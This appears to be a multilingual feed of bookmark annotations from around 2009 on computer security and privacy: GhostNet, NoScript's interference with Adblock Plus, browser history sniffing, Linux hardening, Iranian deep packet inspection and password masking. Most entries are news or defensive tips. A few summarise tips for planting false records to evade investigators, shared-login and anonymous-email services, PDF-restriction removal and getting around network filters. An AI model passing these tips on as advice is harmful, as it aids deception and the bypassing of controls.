This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured.

Recently I wrote about how not giving extension developers a good way to earn money might lead to very undesirable effects. The recent events give an impression of the kind of effects we should expect here. This is going to be about the popular NoScript extension which happens to make its money from ads.

"NoScript was extended by a piece of obfuscated (!) code to specifically target Adblock Plus and disable parts of its functionality" hoooboy

NoScript might be somewhat extreme but the “business offer” emails I occasionally see in my inbox make me think that we will see more of this. Companies start to recognize the potential of Firefox extensions and push extension authors into monetizing their extensions by questionable means — at the expense of the users. <how to disable the change page: see See http://noscript.net/faq#qa2_5 it says: disable this feature by opening about:config (just like it was a normal web address) and toggling off the noscript.firstRunRedirection preference>

While the current state of affairs (NoScript’s manipulation of Adblock Plus is visible to the user if he knows where to look, it is documented and even reversible) is better than what we had before I still think that extensions manipulating other extensions to prevent them from doing their job is not where we want to be. NoScript might be somewhat extreme but the “business offer” emails I occasionally see in my inbox make me think that we will see more of this. Companies start to recognize the potential of Firefox extensions and push extension authors into monetizing their extensions by questionable means — at the expense of the users. Update (2009-05-02): Apparently, thanks to some pushing from AMO yet another NoScript version was released. This one supposedly no longer adds a filter subscription to Adblock Plus and also removes the one added by the previous versions. Update 3 (2009-05-04): NoScript author made an official statement on the events.

Important for anybody who thinks that NoScript is the saviour of your privacy: nope, not so much.

e locks and hotel room safes: These days, Tobias is attacking the lock famous for protecting places li

Get Wired's take on technology business news and the Silicon Valley scene including IT, media, mobility, broadband, video, design, security, software, networking and internet startups on Wired.com

Thinking like a criminal is Tobias' idea of fun. It makes him laugh. It has also made him money and earned him a reputation as something of the Rain Man of lock-breaking. Even if you've never heard of Tobias, you may know his work: He's the guy who figured out how to steal your bike, unlock your front door, crack your gun lock, blow up your airplane, and hijack your mail. Marc Weber Tobias has a name for the headache he inflicts on his targets: the Marc Weber Tobias problem.

"Marc Weber Tobias can pick, crack, or bump any lock. Now he wants to teach the world how to break into military facilities and corporate headquarters."

An article about someone with a gift for picking locks.

Tobias is laughing. And laughing. The effect is disconcerting. It's a bwa-ha-ha kind of evil mastermind laugh—appropriate if you've just sacked Constantinople, checkmated Deep Blue, or handed Superman a Dixie cup of kryptonite Kool-Aid, but downright scary in a midtown Manhattan restaurant during the early-bird special. Our fellow diners begin to stare. Tobias doesn't notice and wouldn't care anyway. He's as rumpled and wild as a nerdy grizzly bear. His place mat is covered in diagrams and sketched floor plans and scribbled arrows. His laugh fits him like a

privacy statement, terms of service

TOSBack keeps an eye on 44 website policies. Every time one of them changes, you'll see an update here.

Great new tool from the Electronic Frontier Foundation which allows you to see when a companies online Terms of Service/Privacy Policy is changed

OSBack keeps an eye on 44 website policies. Every time one of them changes, you'll see an update here.

The Terms-Of-Service Tracker

A short Apache config cookbook

A-E

UTF8Encoding

Professional crypto people don’t even get this stuff right. But if you have to encrypt something, you might as well use something that has already been tested.

Matasano Chargen

Remove the Microsoft .NET Framework Assistant (ClickOnce) Firefox Extension

The Microsoft .NET Framework 3.5 Service Pack 1 update, pushed through the Windows Update service to all recent editions of Windows in February 2009, installs the Microsoft .NET Framework Assistant firefox extension without asking your permission.

do you know anything about this?

Microsoft .NET Framework 3.5 Service Pack 1 installs a massive security vulnerability in Firefox, without asking for permission. How to remove it

Convinced from spending hours reading rave reviews, Bob eagerly clicked "Proceed to Checkout" for his gallon of Tuscan Whole Milk and... Whoa! What just happened?

The purpose of Autorun The main purpose of Autorun is to provide a software response to hardware actions that you start on a computer. Autorun has the following features: * Double-Click * Contextual Menu * AutoPlay These features are typically called from removable media or from network shares. During AutoPlay, the Autorun.inf file from the media is parsed. This file specifies which commands the system runs. Many companies use this functionality to start their installers.

How to disable the Autorun functionality

"list of recommendations for using cryptography which, if followed, will make sure you get things right in the vast majority of situations"

Thanks to my background as FreeBSD Security Officer, as a cryptographic researcher, and as the author of the Tarsnap secure online backup system, I am frequently asked for advice on using cryptography as a component in secure systems. While some people argue that you should never use cryptographic primitives directly and that trying to teach people cryptography just makes them more likely to shoot themselves in their proverbial feet, I come from a proud academic background and am sufficiently optimistic about humankind that I think it's a good idea to spread some knowledge around. In light of this, I've put together a list of "Cryptographically Right Answers" -- which is to say, a list of recommendations for using cryptography which, if followed, will make sure you get things right in the vast majority of situations.

Recommendations about cryptography

I didn't realize the automatic boolean attributes part.

how to use mixins in Rails, with loads of useful stuff about testing at the end

Shoulda examples

this bookmark brought from the del.icio.us home.

Security is a hot topic. Ensuring that your websites are secure is extremely important for any web application. In fact, I spend 70% of my time securing my

firefox; beware of security update

see comments

"I'm here to report a small side effect from installing this service pack that I was not aware of until just a few days ago: Apparently, the .NET update automatically installs its own Firefox add-on that is difficult -- if not dangerous -- to remove, once installed. Annoyances.org, which lists various aspects of Windows that are, well, annoying, says "this update adds to Firefox one of the most dangerous vulnerabilities present in all versions of Internet Explorer: the ability for Web sites to easily and quietly install software on your PC." I'm not sure I'd put things in quite such dire terms, but I'm fairly confident that a decent number of Firefox for Windows users are rabidly anti-Internet Explorer, and would take umbrage at the very notion of Redmond monkeying with the browser in any way. Big deal, you say? I can just uninstall the add-on via Firefox's handy Add-ons interface, right? Not so fast. The trouble is, Microsoft has disabled the "uninstall" button on the extension."

Microsoft Update Quietly Installs Firefox Extension http://is.gd/KYiM [from http://twitter.com/sanjayayogi/statuses/1985287536]

Microsoft Update Quietly Installs Firefox Extension A routine security update for a Microsoft Windows component installed on tens of millions of computers has quietly installed an extra add-on for an untold number of users surfing the Web with Mozilla's Firefox Web browser.

フォルダ名を英語化する 「ダウンロード」「ライブラリ」を「Downloads」「Library」にする。それぞれのディレクトリの下にある.localizedファイルを削除する。

セキュリティ周りが充実

Uses HTML and CSS to determine your browsing history. Slowish but effective.

This is a method of sniffing your browsing history without using Javascript. If you haven't cleaned your browsing history recently, just click "Start Scan" and the system will get to work. If this doesn't shock you, it should: websites are not supposed to see this information. It has potential for anyone, in particular advertisers, to view your history and profile you.

ほかにも、タレコミによると購入者宛に自動送信される注文確認メールが店舗にも同報送信されており、送信者は楽天市場、宛先は購入者のアドレス、CCに店舗のアドレス、といった感じになっているため、ここから顧客のメールアドレスを手作業で取り込めば無料で顧客の情報を入手することも可能ですし、メールから受注管理を行うソフトなども存在しているため、リスト化することも容易です。

perl -MCPAN -e 'install IO::Socket::INET'

Robert Kaplan reviews and posits theories of geographical determinism in international relations. Some cool theories here. "The wisdom of geographical determinism endures across the chasm of a century because it recognizes that the most profound struggles of humanity are not about ideas but about control over territory, specifically the heartland and rimlands of Eurasia. Of course, ideas matter, and they span geography. And yet there is a certain geographic logic to where certain ideas take hold. Communist Eastern Europe, Mongolia, China, and North Korea were all contiguous to the great land power of the Soviet Union. Classic fascism was a predominantly European affair. And liberalism nurtured its deepest roots in the United States and Great Britain, essentially island nations and sea powers both. Such determinism is easy to hate but hard to dismiss. "

oh, I must find and read that MacKinder article. What a hypothesis! fabulously heady stuff.

Robert Kaplan on the return of geography.

We all must learn to think like Victorians. That is what must guide and inform our newly rediscovered realism. Geographical determinists must be seated at the same honored table as liberal humanists, thereby merging the analogies of Vietnam and Munich. Embracing the dictates and limitations of geography will be especially hard for Americans, who like to think that no constraint, natural or otherwise, applies to them. But denying the facts of geography only invites disasters that, in turn, make us victims of geography. Better, instead, to look hard at the map for ingenious ways to stretch the limits it imposes, which will make any support for liberal principles in the world far more effective. Amid the revenge of geography, that is the essence of realism and the crux of wise policymaking—working near the edge of what is possible, without slipping into the precipice.

How Geography Determines Human Conflict in the World

People and ideas influence events, but geography largely determines them, now more than ever. To understand the coming struggles, it’s time to dust off the Victorian thinkers who knew the physical world best. A journalist who has covered the ends of the Earth offers a guide to the relief map—and a primer on the next phase of conflict. By Robert D. Kaplan

IT Security has prepared a guide to help you close your system's backdoors and protect you from some of the common Ubuntu exploits.

sudo chown root:admin /bin/su sudo

Not everything is useful on this list

Securing Ubuntu right out of the box. Note: there is some conjecture about whether these are necessary. See feedback in article comments.

Ubuntu is billed as ultra-secure, but its default install has flaws -- here's how to modify your install for the ultimat

"Every digitized packet of online data is deconstructed, examined for keywords and reconstructed within milliseconds."

more on Deep packet

Deep packet inspection

How it's done.

The Iranian regime has developed, with the assistance of European telecommunications companies, one of the world's most sophisticated mechanisms for controlling and censoring the Internet, allowing it to examine the content of individual online communications on a massive scale.

Les autorités iraniennes disposent de grande capacités de surveillance sur Internet (technologies Siemens + Nokia), expliquant pourquoi elles n'ont pas "coupé" le réseau...

Advice about how masking password entries can reduce usability and increase user error and frustration.

Jakob comes out against password masking

More importantly, there's usually nobody looking over your shoulder when you log in to a website. It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.

Got to agree with Jakob here. Seing *****'s as you type your password just leads to mistyped passwords

Can I get an Amen?

I question the overall security of an app if the input isn't masked. Logically, he makes sense, but users aren't asking for it. Leave it be.

Per veure qui et segueix.

フォローした人がスパマーかどうかを判断してくれる

TwitChuck - Seriously taking on Twitter spam

You already know that if you want to lock down your Wi-Fi network, you should opt for WPA encryption because WEP is easy to crack. But did you know how easy? Take a look.

「ウィンドウを閉じてもCookieを残しておいてあげたいサイトは、「例外サイト」で許可してあげればOK。」

Free spyware and malware removal tool.

ComboFix | freeware

Tales from the encrypt: If you care about the integrity of your data, it's time to investigate solutions for accessing and securing it – and not just for the here and now

"But what if I were killed or incapacitated before I managed to hand the passphrase over to an executor or solicitor who could use them to unlock all this stuff that will be critical to winding down my affairs – or keeping them going, in the event that I'm incapacitated? I don't want to simply hand the passphrase over to my wife, or my lawyer. Partly that's because the secrecy of a passphrase known only to one person and never written down is vastly superior to the secrecy of a passphrase that has been written down and stored in more than one place. Further, many countries's laws make it difficult or impossible for a court to order you to turn over your keys; once the passphrase is known by a third party, its security from legal attack is greatly undermined, as the law generally protects your knowledge of someone else's keys to a lesser extent than it protects your own."

When you are embarking on the Linux experience for your initial time, there's a few things you should know.

Linux Mantainance

10 things you should do to a new Linux PC before exposing it to the Internet

for less than the $99 per year that Apple's mobileme service costs

Dopo l'Iran. Come usare Internet per comunicare.

For more than 200 years, buried deep within Thomas Jefferson's correspondence and papers, there lay a mysterious cipher -- a coded message that appears to have remained unsolved. Until now. The cryptic message was sent to President Jefferson in December 1801 by his friend and frequent correspondent, Robert Patterson, a mathematics professor at the University of Pennsylvania. President Jefferson and Mr. Patterson were both officials at the American Philosophical Society -- a group that promoted scholarly research in the sciences and humanities -- and were enthusiasts of ciphers and other codes, regularly exchanging letters about them.

Sweet

Non-JS users get the common masked password fields.

iPhone-like password fields using jQuery // DECAF° blog für digitale kommunikation

Nice jQuery plugin to partially mask password fields.

Ksplice Uptrack is a new service that lets you effortlessly keep your systems up to date and secure, without rebooting. Once you’ve completed the easy installation process, your system will be set up to receive rebootless updates instead of traditional, disruptive updates. Learn more.

Ksplice Uptrack is a new service that lets you effortlessly keep your systems up to date and secure, without rebooting. Once you’ve completed the easy installation process, your system will be set up to receive rebootless updates instead of traditional, disruptive updates.

This software lets you update your linux system without the need for a reboot. Looks pretty promising, available for ubuntu now.

Whether you want to keep your kids eyes away from inappropriate content or your employees from wasting time online, you'll find a variety of great tools available for filtering internet access in today's Hive Five. Photo by Zach Klein. Last week we asked you to share your favorite method of filtering internet content. While we originally intended to approach the topic from a software angle, it quickly became apparent that software didn't cut it for most people and that the majority of you are using either a combination of desktop software and a proxy server/firewall or just the latter by itself. The following solutions range, in difficultly of installation, from as simple as requiring five minutes to install to as complex as setting up a physical computer as a Linux-based content filter. DansGuardian (Cross Platform, Free) One way to measure whether or not Dansguardian is the right filtering tool for you is your willingness to install and tinker with an opera

A Hidim turns a torrent into a regular PNG image

Torrent into PNG

Are you one of those people who has always wanted to hide a torrent inside an image? Wait no longer, with Hid.im it takes just one click to convert a torrent into an image file, with the option to decode it later on.

Short, interesting profile -- reminded me of Neil Strauss' 'Emergency' (http://www.amazon.com/Emergency-This-Book-Will-Save/dp/0060898771/ref=sr_1_1?ie=UTF8&s=books&qid=1248037945&sr=8-1) and a lengthier New Yorker profile on 'chameleon' Frederic Bourdin - http://www.newyorker.com/reporting/2008/08/11/080811fa_fact_grann

Former private investigator helps people "disappear" and move to new lives.

There are three key steps to disappearing. First, destroy old information about yourself. Call your video store or electricity company and replace your old, correct phone number with a new, invented one. Introduce spelling mistakes into your utility bills. Create a PO Box for your mail. Don’t use your credit cards and the like. Then, create bogus information to fool private investigators who might be looking for you. Go to one city and apply for an apartment. Rent a car in another one. The next, final step is the most important one. Move from point A to point B. Create a dummy company to pay your bills. Only use prepaid mobile phones and change them every month. It is nearly impossible to find out where you are unless you make a mistake.

''help people disappear''

An ex PI now helps people disappear.

HTML 5 and CSS 3 are quickly gaining popularity, revealing their collective power with some exciting new design possibilities.

Web designers can do some pretty cool stuff with HTML 4 and CSS 2.1. We can structure our documents logically and create information-rich sites without relying on archaic, table-based layouts. We can style our web pages with beauty and detail without resorting to inline <font> and <br> tags. Indeed, our current design methods have taken us far beyond the hellish era of browser wars, proprietary protocols, and those hideous flashing, scrolling, and blinking web pages.

Times Online

hi

Program that makes email self destruct

ehind Vanish in detail. Briefly, as mentioned above, the user never knows the encryption key. This means that there is no risk of the user exposing that key at some point in the future, perhaps through coercion, court order, or compromise. So what do we do with the key? We could escrow it with a third party, but that raises serious trust issues (e.g., the case with Hushmail).

copies of Vanish encrypted data — even archived or cached copies — will become permanently unreadable at a specific time, without any action on the part of the user or any third party or centralized service.

Storing the decryption key across many p2p nodes means you can "lose" the key at a specified time. As long as one of the p2p nodes you have used destroys the key, we can no longer decrypt the message. The theory is certainly sound, lets hope the implementation is.

Vanish is a research system designed to give users control over the lifetime of personal data stored on the web or in the cloud. Specifically, all copies of Vanish encrypted data — even archived or cached copies — will become permanently unreadable at a specific time, without any action on the part of the user or any third party or centralized service.

AllowUsers root vivek jerry

a sexy, non-reversible live visualization of password field input

Creates a color-bar visualization of the password field useful to avoid mistakes and non-reversible.

a non-reversible live visualization of password field input

InfoQ: The First Few Milliseconds of an HTTPS Connection

Annotated link http://www.diigo.com/bookmark/http%3A%2F%2Fitshidden.com

service using VPN to provide privacy - should be frequently used with bittorrent torrent file-sharing etc ItsHidden.com is the ultimate FREE surfing privacy service on the Internet with huge capacity and no complicated software to install, you already have everything you need on your computer right now!

Make your video shorter, automatically -- for webcams, monitoring and security

send email anonymously. or send an email from anywhere privacy is a concern and you can't login to your own account. cool idea.

# Anonymous email sender. # Send as many emails as you like. # Free, no registration needed. # Similar websites: DeadFake.

Very NEAT

Send Anonymous Email

Scary news story on SN outage all being about targetting one user

Why were Twitter and Facebook down for much of August 7, 2009? It looks like it was a denial of service attack... aimed at just a single person. Probably not a good strategy - taking out the network to silence an individual - because it mobilizes so many resources to fix the problem (people wouldn't care so much if just a single account was hacked). But still interesting.

InSecurity Complex - CNET News

article on lockpicker Marc Weber Tobias

Marc Weber Tobias can pick, crack, or bump any lock. Now he wants to teach the world how to break into military facilities and corporate headquarters.

Wired.com: The Ultimate Lock Picker Hacks Pentagon, Beats Corporate Security for Fun and Profit - http://bit.ly/fSW4Q (via @BlackHatEvents) [from http://twitter.com/jkordish/statuses/1997565339]

Pretty discouraging article about the efficacy of locks beyond keeping honest people honest.

In short words jCryption is a javascript HTML-Form encryption plugin, which encrypts the POST/GET-Data that will be sent when you submit a form. It uses the Multiple-precision and Barrett modular reduction libraries for the calculations and jQuery for the rest.

** Posted using Viigo: Mobile RSS, Sports, Current Events and more **

In short words jCryption is a javascript HTML-Form encryption plugin, which encrypts the POST/GET-Data that will be sent when you submit a form. It uses the Multiple-precision and Barrett modular reduction libraries for the calculations and jQuery for the rest. jCryption is completly free and dual licensed under the MIT and GPL licenses like jQuery.

Of all the elements of web design and coding, htaccess can be one of the most intimidating. After all, it's an incredibly powerful tool and one that has the

In a privacy error that underscores some of the biggest problems surrounding cloud-based services, Google has sent a notice to a number of users of its Document and Spreadsheets products stating that it may have inadvertently shared some of their documents with contacts who were never granted access to them.

Google products are NOT FREE. The Worlds’ Biggest Data Hoover makes you pay with your privacy. Enjoy the ride in the “cloud”. reply Paul - March 7th, 2009 at 1:31 am PST I agree with this balanced opinion. reply Smart Babes Are Sexy Blog - March 7th, 2009 at 7:49 am PST Free or not, some things are just not acceptable. Yes, air is “free”, but that does not allow people to pollute it with without abandon. Facebook is “free”, but that does not allow it to take away all ownership rights of all the content I would post there. As one comic book character once said, “With great power comes grea

Google is Evil?

More than half of the internet’s top websites use a little known capability of Adobe’s Flash plugin to track users and store information about them, but only four of them mention the so-called Flash Cookies in their privacy policies, UC Berkeley researchers reported Monday.

internet privacy

IP Hider masks the real IP of a user, allowing him to browse all kind of pages without ever worrying that the ISPs or any other marketing tool is monitoring your surfing habits or spammers are attacking your computer. The simplest way to do this is to have traffic redirected through anonymous proxies.

IP Hide

Guia de privacidade no Facebook do Ars Technica.

ThinkVitamin - Carsonified's blog about the web

WEB DESIGN

death

Your Facebook photos, profile and friends saved to your machine or device - now with Time Capsule!

SocialSafe - Save. Store. Explore. The backup tool for Facebook

Educational hacking comic from Korea that writes up how to solve a DEFCON challenge.

n set your login url to something more cryptic. This won’t secure your website

WordPress for Beginners Beginners Guide Plugins Showcase Themes Tutorials Contact Free Wordpress Blog Setup

As we continued to emphasize the security of your WordPress admin panel due to the recent attack on our site, we have compiled a fully detailed article that will highlight some of the must have security measures for your WordPress Admin Area.

>認証済みアカウントとは？ アカウントが本人のものかという混乱を避けるため、Twitterは「認証済みアカウント」の実験（ベータ版テスト）を始めます。われわれは、日頃からなりすましや、本人かどうかという混乱に悩まされる人たちの信頼性を確立するよう働きかけています。Verifiedのついたアカウントは本物です！ どういう意味？ この仕組みがあれば、われわれが知っているプロフィールのどれが「本物」で信頼できるかを、簡単に見極めることができます。これは、われわれがその人や存在と連絡を取り合い、プロフィールが確認されたものであることを表し、認証されたことを意味します。（これは、実際に誰がTwitterに書き込みをしているかを認証するものではありません） これはまた、「認証済みアカウント」マークがないプロフィールが偽物であるというわけでもありません。Twitter上の大多数のアカウントはなりすましではありませんし、われわれはなりすましを100％チェックできるわけでもありません。今後は、誤ったアイデンティティーやなりすましがあった場合に対処するため、一部のプロフィールを認証するにすぎないのです。 もし、まだ認証されていないアカウントが本物か迷っている場合は、その当人の公式ウェブサイトを確認し、その人のTwitterプロフィールにリンクが貼られているかを見てみることができます。（たびたびになりますが、リンクがないからといってなりすましということではありません） 誰のアカウントに「認証済みアカウント」マークが表示されるの？ われわれは、なりすましやアイデンティティーの混乱等の問題を抱える著名な方のプロフィールから認証を始めます。（例えば、著名なアーティスト、アスリート、俳優、政府関係者や公共機関等です。）将来はもっと沢山のプロフィールを認証する予定ですが、まずは費用と時間の関係で、一部のアカウントのみから始めます。何ヶ月かを経てテストが進歩してきたら、もっと沢山のプロフィールにまで範囲を広げてこのテストを行なっていけるでしょう。 なりすましなどの問題に困ってます。自分のアカウントを認証できるの？ すべてのプロフィールを認証することはできませんが、もしあなたのアカウントが日常的になりすましなどの問題がある場合は解決に向けてお手伝いします。 …

With this feature, you can easily see which accounts we know are 'real' and authentic. That means we've been in contact with the person or entity the account is representing and verified that it is approved. (This does not mean we have verified who, exactly, is writing the tweets.)

"To prevent identity confusion, Twitter is experimenting (beta testing) with a 'Verified Account' feature. We're working to establish authenticity with people who deal with impersonation or identity confusion on a regular basis. Accounts with a [check mark indicating they are] Verified are the real thing!"

"With this feature, you can easily see which accounts we know are 'real' and authentic. That means we've been in contact with the person or entity the account is representing and verified that it is approved. (This does not mean we have verified who, exactly, is writing the tweets.)"

To prevent identity confusion. Test-Version.

To prevent identity confusion, Twitter is experimenting (beta testing) with a 'Verified Account' feature. We're working to establish authenticity with people who deal with impersonation or identity confusion on a regular basis.

Tcpdump is the premier network analysis tool for information security professionals. Having a solid grasp of this über-powerful application is mandatory for anyone desiring a thorough understanding of TCP/IP. Many prefer to use higher level analysis tools such as Wireshark, but I believe this to usually be a mistake. In a discipline so dependent on a true understanding of concepts vs. rote learning, it's important to stay fluent in the underlying mechanics of the TCP/IP suite. A thorough grasp of these protocols allows one to troubleshoot at a level far beyond the average analyst, but mastery of the protocols is only possible through continued exposure to them. ... for this reason I strongly advocate using tcpdump instead of other tools whenever possible.

"If I can't find money and valuables in the normal places I usually find them, I would continue to tear the house apart until I found something," which is why the post advises that, in addition to your hiding spots, it's best to leave some money out in obvious places if, say, you're heading on a vacation and are concerned about would-be thieves. This can not only save your other stash of money, but may actually keep the burglar from destroying your place as he looks for where you have hidden your money. If they believe they may have found the cash that you have in the house, they are much less likely to keep looking (remember, they want to get out asap). In the end, if you hide all your money well, you may win a moral victory in not letting the burglar find the money, but you'll likely have much more damage done to your place that will end up costing you more in the long run.

How to Create Totally Secure Cookies

Securing cookies and sessions is vital to keeping an application secure. Many tutorials have been written on the subject, but as the internet (and browsers loading it) evolve so do the methods you can use to keep your application secure. In this article we’re going to break down the various components of a cookie and what they mean for security. This will include limiting the cookie to certain domains and paths on those domains, choosing what information to store, and protecting the cookie from cross site scripting exploits. In a second article we will go into more depth in how to protect everyone’s favorite cookie, the session ID.

Removes restrictions on PDFs through an upload.

Conectate a cualquier sitio que necesite user & password

This service is made for you to save your time on registration for many sites. You can not register at all sites, so just type the name of site for which you need to enter login and password and click «Get».

free security software/services

Recommended by Gizmo

anti virus and more

virus spyware antivirus security

Recommended by Lifehacker

Windows only: Corporate firewall got you down? No Facebook behind your school's filter? FreeProxy is a simple proxy tool for routing your browsing through your home computer.

Amazon Virtual Private Cloud (Amazon VPC) lets you create your own logically isolated set of Amazon EC2 instances and connect it to your existing network using an IPsec VPN connection. This new offering lets you take advantage of the low cost and flexibility of AWS while leveraging the investment you have already made in your IT infrastructure.

@igrigorik: "cool, amazon launches "virtual private cloud" service @ http://bit.ly/w2z6d" (from http://twitter.com/igrigorik/status/3556113445)

Prevent spambots from getting your email, encode all the email addresses you publish on your site! Enter the address you want to encode, then put the code we provide in the source code where the address should appear and...VOILA!

防止email地址被垃圾邮件爬虫

Prevent spambots from getting your email, encode all the email addresses you publish on your site!

If you’ve encountered a situation where you leave your email address on a public website and start getting spam starting next day, then you are not alone. Mailto Encoder is a site which helps to prevent this by encoding your email address with javascript in a way that makes it unreadable to any spam bot spider or email extractor.

インストールされているソフトのライセンスキーをぶっこ抜いてくれるフリーウェア

Windowsのレジストリに登録されているランセンスキー情報をスキャンしてくれるソフトですね。自分が使っているソフトのキーって何だったっけ？というときに便利。動作も軽快です。

Sounds like whoever drafted the bill had just finished watching Die Hard 4.

Critics question revised proposal from Sen. Jay Rockefeller to let the White House do what it deems necessary to respond to a 'cybersecurity emergency.' Read this blog post by Declan McCullagh on Politics and Law.

The new version would allow the president to "declare a cybersecurity emergency" relating to "non-governmental" computer networks and do what's necessary to respond to the threat. Other sections of the proposal include a federal certification program for "cybersecurity professionals," and a requirement that certain computer systems and networks in the private sector be managed by people who have been awarded that license.

When Rockefeller (D-W. Virginia), the chairman of the Senate Commerce committee, and Olympia Snowe (R-Maine) introduced the original bill in April, they claimed it was vital to protect national cybersecurity. "We must protect our critical infrastructure at all costs--from our water to our electricity, to banking, traffic lights and electronic health records," Rockefeller said. The Rockefeller proposal plays out against a broader concern in Washington, D.C., about the government's role in cybersecurity. In May, President Obama acknowledged that the government is "not as prepared" as it should be to respond to disruptions and announced that a new cybersecurity coordinator position would be created inside the White House staff. Three months later, that post remains empty, one top cybersecurity aide has quit, and some wags have begun to wonder why a government that receives failing marks on cybersecurity should be trusted to instruct the private sector what to do.

ext page inline without having to reload. Each of the extensions works a little differently, and

Use Firefox to Fix the Web's Biggest Annoyances

Below is a list of some third-party sites where you can find free proxy server lists.

a list of some third-party sites where you can find free proxy server lists.

good list of proxies

»In the first part of this series we went over how a cookie works and what can be done to secure them. In this section we’re going to go over ways to add additional security to the session beyond the cookie itself.«

I've been looking for a good way to do sessions. I only skimmed so needs further reading.

Carsonified &gt;&gt; How to Create Bulletproof Sessions http://ow.ly/nCXn [from http://twitter.com/10minuteexpert/statuses/3694747748]

If you're using Firefox's built-in password management, you should also be using its master password feature to protect your saved passwords from prying eyes. But what happens if you lose your master password?

If you&#039;re using Firefox&#039;s built-in password management, you should also be using its master password feature to protect your saved passwords from prying eyes. But what happens if you lose your master password?

Freeware Files.com Download Page.

find program product keys and passwords so you can re-install

UPGRADE! sorry. didn't mean to yell. But cleaning your corrupted install sucks a nut.

Wordpress under attack?

Good reminder of why it's important to keep your Wordpress blog updated and patched

RT @wordpress: How to Keep WordPress Secure: http://bit.ly/12zHUd [from http://twitter.com/Jennerosity/statuses/3785091291]

There is another serious WordPress hack making the rounds. If you run WordPress, make sure you upgrade ASAP

birthdate

wiki

Every kid has a creative stash for secret stuff, but that useful enthusiasm doesn't have to die off just because we've traded treehouses for desks. See how you can hide money, files, workspaces, and more in today's Top 10.

** Posted using Viigo: Mobile RSS, Sports, Current Events and more **

10 Consejos para proteger sus pertenencias :-P

and out of

We intend for this site to be a central location for information on how to move your data in and out of Google products. Welcome.

save

People everywhere are mindlessly over-sharing on the world's largest social network, without a second thought as to who's reading their posts or what effect it could have on them further down the road.

5 Easy Steps to Stay Safe (and Private!) on Facebook

When the President of the United States warns schoolchildren to watch what they say and do on Facebook, you know that we've got a problem...and it's not one ...

hen the President of the United States warns schoolchildren to watch what they say and do on Facebook, you know that we've got a problem...and it's not one limited to the U.S.'s borders, either. People everywhere are mindlessly over-sharing on the world's largest social network, without a second thought as to who's reading their posts or what effect it could have on them further down the road. For example, did you know that 30% of today's employers are using Facebook to vet potential employees prior to hiring? In today's tough economy, the question of whether to post those embarrassing party pics could now cost you a paycheck in addition to a reputation. (Keep that in mind when tagging your friends' photos, too, won't you?) But what can be done? It's not like you can just quit Facebook, right? No - and you don't have to either. You just need to take a few precautions.

ng to enter here is "Only Friends." Anythin

Should you spend your money on a home security system? A look inside a burglar's mind might help you decide.

Awesome online game

A new, Serious ARG (SARG?), from the people who brought you Perplex City. This time, commissioned by Channel 4 and aimed at teens. '...its goal is to illustrate the threats, dangers and opportunities of life online'. It doesn't have any offline activity, as far as I can tell, which makes sense with this demographic, the fact that Channel 4 is involved and the subject matter. It's a little to leading in the interactivity though, and not at really transmedia, so not strictly within the realms of what has come to be known as ARG. Still, interesting to see a current, non-commercial example of a participation drama.

Game supposedly teaching how to behave "responsibly" on social networking websites (and alike).

Nuorisolle suunnattu peli nettiturvallisuudesta

Advanced Encryption Standard (AES)

good explanation of AES Rijndael.

Wordpressに入れておくべき、基本的なプラグイン「これは入れておかないと損するよ」という、実用性重視のプラグインの紹介。 セキュリティ対策【Akismet】スパムコメントを、除外する。元から入っているプラグインなので、有効化すべし。WordPress.com API キーが必要なので、面倒くさがらず、画面の指示に従い登録しましょう。ちなみに、他にwordpressのサイトを立ち上げた場合でも、再び、同じキーが使えますよ。 【Secure Wor...

後で入れる

Mejorar la velocidad de JSON

When you’re working with JSON, performance and security are often opposing, yet equally important concerns. One of these areas of contention is handling the JSON strings returned by a server. Most JavaScript libraries do a great job of abstracting away the details, but the underlying process has long been a frustrating exercise in compromise. On one hand, eval() is the fastest widely available method, but it is not safe. On the other hand, textual JSON parsers written in JavaScript may be much safer, but are dramatically slower. In client-side situations, where milliseconds count, such a large performance overhead is typically too prohibitive to accept. Recently, an exciting new alternative has emerged: browser-native JSON parsing. Integrating JSON parsing as part of the browser’s implementation of JavaScript allows for using the more secure parsing method, and even provides performance faster than eval() offers.

Recently, an exciting new alternative has emerged: browser-native JSON parsing. Integrating JSON parsing as part of the browser’s implementation of JavaScript allows for using the more secure parsing method, and even provides performance faster than eval() offers. To take advantage of that, this post will show you how to detect whether or not a browser supports native JSON parsing, and how to force jQuery to use browser-native parsing in its $.ajax calls when it is available.

Metasploit Bible (free)

Good presentation

1 hr talk (via DaringFireball)

20+ Powerful Wordpress Security Plugins and Some Tips and Tricks

OR YOU CAN CLIP IT OFF

いつかiphoneを買ったときのために。

Artikel über einen Botnet Master, Der via MSN von einem Cisco Experten Interviewt wurde. Bsonders interessant sind die Motive, warum Er keinen "normalen" Job annimmt.

GR: Infiltrating a Botnet - Cisco Systems http://bit.ly/1jHXy6 [from http://twitter.com/robinhowlett/statuses/3516971966]

Technical, but interesting read.

Timing Attacks

One crucial part of PHP development practice is always keeping in mind that security is not something you can simply buy off the shelf at your local convenient

Teaching computers to read: Google acquires reCAPTCHA - http://bit.ly/mNdrd [from http://twitter.com/hadhad/statuses/4038838588]

Found this: Teaching computers to read: Google acquires reCAPTCHA: Shared by cec Wholly geek batman ... http://bit.ly/dTqYG [from http://twitter.com/kekil/statuses/4034854001]

"In this way, reCAPTCHA’s unique technology improves the process that converts scanned images into plain text, known as Optical Character Recognition (OCR). This technology also powers large scale text scanning projects like Google Books and Google News Archive Search. Having the text version of documents is important because plain text can be searched, easily rendered on mobile devices and displayed to visually impaired users. So we'll be applying the technology within Google not only to increase fraud and spam protection for Google products but also to improve our books and newspaper scanning process. That's why we're excited to welcome the reCAPTCHA team to Google, and we're committed to delivering the same high level of performance that websites using reCAPTCHA have come to expect. Improving the availability and accessibility of all the information on the Internet is really important to us, so we're looking forward to advancing this technology with the reCAPTCHA team."

I know I'm late to the game commenting on this one, but damn this kind of thing pisses me off. Can't we have just one thing that is cool on the internet without it getting acquired by Google or Yahoo? I'm not as anti-google as most, but all of a sudden reCAPTCHA feels exploitative. Brewster Kahle, where is the alternative for archive.org?

